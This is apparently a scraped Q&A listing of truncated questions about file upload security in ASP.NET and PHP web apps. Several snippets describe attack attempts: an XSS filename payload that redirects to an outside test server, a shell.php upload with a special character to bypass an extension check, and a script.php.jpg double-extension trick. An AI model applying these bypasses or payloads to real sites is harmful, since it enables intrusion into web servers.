2回答
在我正在做的文件上传功能中,一个重要的问题是我可以保存图像用户上传的路径。在下面的代码中,我已经在基于web的应用程序文件夹中指定了保存上传文件的文件夹。我的指导员告诉我,在asp.net UploadFile控件的代码后面还有一个安全漏洞,我不知道为什么!= @"~\Images\";
string comPath = Server.MapPath(path + "\\" + FileUpl
浏览 4提问于2013-03-20得票数 2
我有一个asp.net MVC2应用程序,我正在使用uploadify。我正在将文件直接上传到sql服务器数据库中。我需要做哪些必要的检查以及如何进行检查?我想执行防病毒扫描?这里可能存在哪些安全漏洞?
浏览 1提问于2011-07-18得票数 0
好了,除了检查文件类型和文件大小两个服务器端,我如何才能避免安全漏洞,在上传的文件,可能会危及我的系统(主要是从高级黑客)。这足够了吗?我不是在谈论任何特殊的场景,只是简单的文件上传。
浏览 2提问于2010-12-21得票数 0
回答已采纳
假设我们有一个要求,用户上传到我们的ASP.NET核心MVC应用程序的每个文件都必须以加密的形式存储在共享文件夹中,并且这些文件必须保留,直到用户删除它们(所以这可能需要很长时间)。共享文件夹部分并不难,但是加密上传文件的“正确”方法是什么呢?当用户上传文件时,我们得到的是一个包含原始文件名的字符串和一个包含文件内容的流,所以这是起点,但我不知道如何继续。有大量的Google结果,
浏览 23提问于2021-01-28得票数 2
1回答
如果我不能使用它(我做了上传,但不是通过帖子),所以我必须使用rename功能,我需要采取什么安全措施?
编辑
@Pekka要求我详细说明我打算如何上传该文件。我将通过Ajax上传文件,并且我有一些用于上传倍数文件的队列功能。因此,我正在使用php://input流。如果我正确地理解了Pekka的答案,我就没有什么好担心的了,因为我将该文件作为一个流,并且我不会复制任何临时文件。如果我错了,请纠正我
浏览 0提问于2012-08-12得票数 1
回答已采纳
我目前正在开发一些使用asp.net MVC,我仍然没有相当的经验,所以请帮助我。这个概念中是否存在安全漏洞?
非常感谢
浏览 4提问于2009-10-31得票数 0
回答已采纳
最近,我们实现了一个特性,它在我们的App_Themes文件夹中动态生成一个较少的文件。这是在应用程序启动时完成的。这要求我们授予@ApplicationPoolIdentity@ write对App_Themes文件夹的访问权限。
浏览 1提问于2016-06-07得票数 1
回答已采纳
3回答
我试图利用文件上传的文件名字段中的漏洞进行攻击。web应用程序无法正确验证上传文件的文件名,因此存在存储的跨站点脚本漏洞。我的问题是,每当我试图重命名文件以包含类似于下面的有效负载时,我就不能在文件名中包括/。
document.location='http://my_test_server.com/bla.php?甚至有可能利用这个漏洞吗?
浏览 0提问于2018-04-19得票数 2
回答已采纳
1回答
XSS能引导我们找到本地文件包含还是远程文件包含?我读过一篇文章,它可以通过XSS漏洞上传shell,但我仍然不知道它是如何实现的。
浏览 0提问于2012-06-06得票数 1
回答已采纳
1回答
我试图复制这个漏洞:
根据解释,可以绕过Wordpress插件中的检查,在php扩展后添加一个特殊的char。我正在尝试攻击,文件上传时名为shell.php<special_char>,包含一个简单的php代码<?php echo "poc"; ?>。
然后,我应该在<target>/....在哪种情况下,可以利用允许上传扩展名为p
浏览 0提问于2020-12-22得票数 1
4回答
我有一个网页,其中我有一个ASP.NET文件上传控件从客户端机器上传文件到Server.Now我想要上传n个times.Ex :我想从我的本地pc上载100个文件到server.The 100个文件名我可以从我的program.But中读取excel文件有没有办法将这个文件分配给文件上载控件?
浏览 2提问于2009-02-12得票数 1
回答已采纳
我需要测试一个网站,我发现一个脆弱的文件上传。只检查文件扩展名是.jpg、.png还是.pdf。我可以通过上传一个名为script.php.jpg的文件来绕过这个问题。我知道上传的文件存储在/uploads中。
我怎样才能执行那个脚本?在浏览器中键入http://example.com/uploads/script.php.jpg时,脚本不会执行。我知道服务器可以执行php代码,服务器有文件漏洞
浏览 0提问于2018-06-24得票数 1
我在我的asp.net网站上有一个异步文件上传。我必须在文件上传中显示一个文件名。我有一个编辑功能,它必须显示上传的文件在文件上传的名称。我只想显示我在页面加载过程中拥有的文件名,如何在服务器端(c#)为文件上传指定文件名,以及如何从服务器端更改文件上传的背景颜色。<asp:AsyncF
浏览 2提问于2012-01-20得票数 0
与手动查找漏洞相比,w3af等工具在查找web应用程序漏洞方面的效率如何?他们是否能够找到OWASP前10名中的所有漏洞,如反射xss、持久xss、sqli、lfi/rfi和不受限制的文件上传?还是会有一些漏洞从裂缝中掉下来,仍然没有被发现?
浏览 0提问于2014-11-27得票数 0
与手动查找漏洞相比,像w3af这样的工具在查找web应用程序漏洞方面有多有效?他们是否能够从OWASP前10名中找到所有漏洞,如反射xss、持久xss、sqli、lfi/rfi和不受限制的文件上传?还是会有一些漏洞从裂缝中掉下来,而仍未被发现?
浏览 0提问于2014-11-27得票数 3
2回答
当我学习关于文件上传漏洞的时候,一个问题浮现在我的脑海中。在搜索文件上载漏洞时使用哪种类型的文件?是否需要检测后端使用哪种编程语言?大多数示例中都使用Php扩展名文件。
浏览 0提问于2022-05-17得票数 1
扫码
添加站长 进交流群
领取专属 10元无门槛券
手把手带您无忧上云
相关资讯
热门标签
云服务器
ICP备案
对象存储
腾讯会议
实时音视频活动推荐
腾讯云开发者
